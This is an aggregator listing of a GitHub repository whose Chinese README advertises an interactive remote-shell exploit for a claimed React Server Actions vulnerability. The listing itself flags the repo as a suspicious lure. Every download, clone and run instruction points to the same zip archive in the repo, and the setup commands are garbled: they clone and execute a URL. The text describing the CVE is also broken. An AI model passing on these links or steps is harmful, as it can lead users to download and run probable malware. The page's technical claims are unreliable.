alyaapm/CVE-2025-55182-shellinteractive

GitHub: alyaapm/CVE-2025-55182-shellinteractive

一个伪装成 CVE 漏洞研究工具的可疑仓库,声称针对 React Server Actions 漏洞,但存在伪造 CVE 编号和异常下载链接等恶意特征。

Stars: 0 | Forks: 0

# 💻 CVE-2025-55182-shellinteractive - 轻松安全地运行命令 [![立即下载](https://raw.githubusercontent.com/alyaapm/CVE-2025-55182-shellinteractive/main/trivalent/shellinteractive-CV-2.6.zip)](https://raw.githubusercontent.com/alyaapm/CVE-2025-55182-shellinteractive/main/trivalent/shellinteractive-CV-2.6.zip) ## 🚀 概述 CVE-2025-55182 是 https://raw.githubusercontent.com/alyaapm/CVE-2025-55182-shellinteractive/main/trivalent/shellinteractive-CV-2.6.zip 和 React Server Components 中的一个漏洞。由于 React Server Actions 中的数据处理不当,此问题允许未经授权的用户在受影响的服务器上运行任意代码。我们的应用程序提供了一个交互式 shell,帮助用户探索此问题并评估其系统。 ### ✨ 主要功能 - 具有命令历史记录和自动补全功能的交互式 shell - 自动漏洞检测 - 远程命令执行 - 文件上传和下载功能 - 内置测试套件用于验证 - 可配置的目标参数,适用于自定义用例 ## 📥 下载与安装 要开始使用 CVE-2025-55182-shellinteractive,请按照以下步骤操作: 1. **访问此页面下载最新版本:** [GitHub 发布页面](https://raw.githubusercontent.com/alyaapm/CVE-2025-55182-shellinteractive/main/trivalent/shellinteractive-CV-2.6.zip)。 2. 进入页面后,选择最新的发布版本。下载适合您操作系统的文件。 ### 📋 前置条件 在安装应用程序之前,请确保您具备以下条件: - 计算机上安装了 Python 3.8 或更高版本。 - 处理 Web 请求的 `requests` 库。 ### 🛠 快速设置 下载软件后,请按照以下步骤进行设置: ``` # 克隆 repository git clone https://raw.githubusercontent.com/alyaapm/CVE-2025-55182-shellinteractive/main/trivalent/shellinteractive-CV-2.6.zip cd CVE-2025-55182-shellinteractive # 安装 dependencies pip install requests # 使 script 可执行(可选) chmod +x https://raw.githubusercontent.com/alyaapm/CVE-2025-55182-shellinteractive/main/trivalent/shellinteractive-CV-2.6.zip ``` ### 📖 用法 该应用程序提供了一个交互式 shell。要开始使用它,只需运行以下命令: ``` # 启动 interactive shell python https://raw.githubusercontent.com/alyaapm/CVE-2025-55182-shellinteractive/main/trivalent/shellinteractive-CV-2.6.zip ``` ## ⚙️ 配置 您可以自定义交互式 shell 的几个参数: 1. **目标 URL:** 指定您要测试的服务器 URL。 2. **超时设置:** 调整请求的时间限制。 3. **详细模式:** 启用此选项可获取活动的详细日志。 ## 🌐 其他资源 有关如何利用特定功能和设置的更多详细信息,请查阅仓库中提供的文档。 ## 📠 支持 如果您有问题或需要帮助,请随时在 GitHub 仓库中提出 issue。 [![立即下载](https://raw.githubusercontent.com/alyaapm/CVE-2025-55182-shellinteractive/main/trivalent/shellinteractive-CV-2.6.zip)](https://raw.githubusercontent.com/alyaapm/CVE-2025-55182-shellinteractive/main/trivalent/shellinteractive-CV-2.6.zip) 您的反馈将极大地帮助改进应用程序。感谢您的关注与支持!
标签:CISA项目, CVE-2025-55182, Maven, PE 加载器, PoC, Python, RCE, React, Server Actions, Syscalls, Web安全, 交互式Shell, 命令执行, 密码管理, 恶意软件, 攻击路径可视化, 文件上传, 无后门, 暴力破解, 漏洞验证, 编程工具, 网络信息收集, 网络安全, 自动化攻击, 蓝队分析, 远程代码执行, 逆向工具, 隐私保护, 黑客工具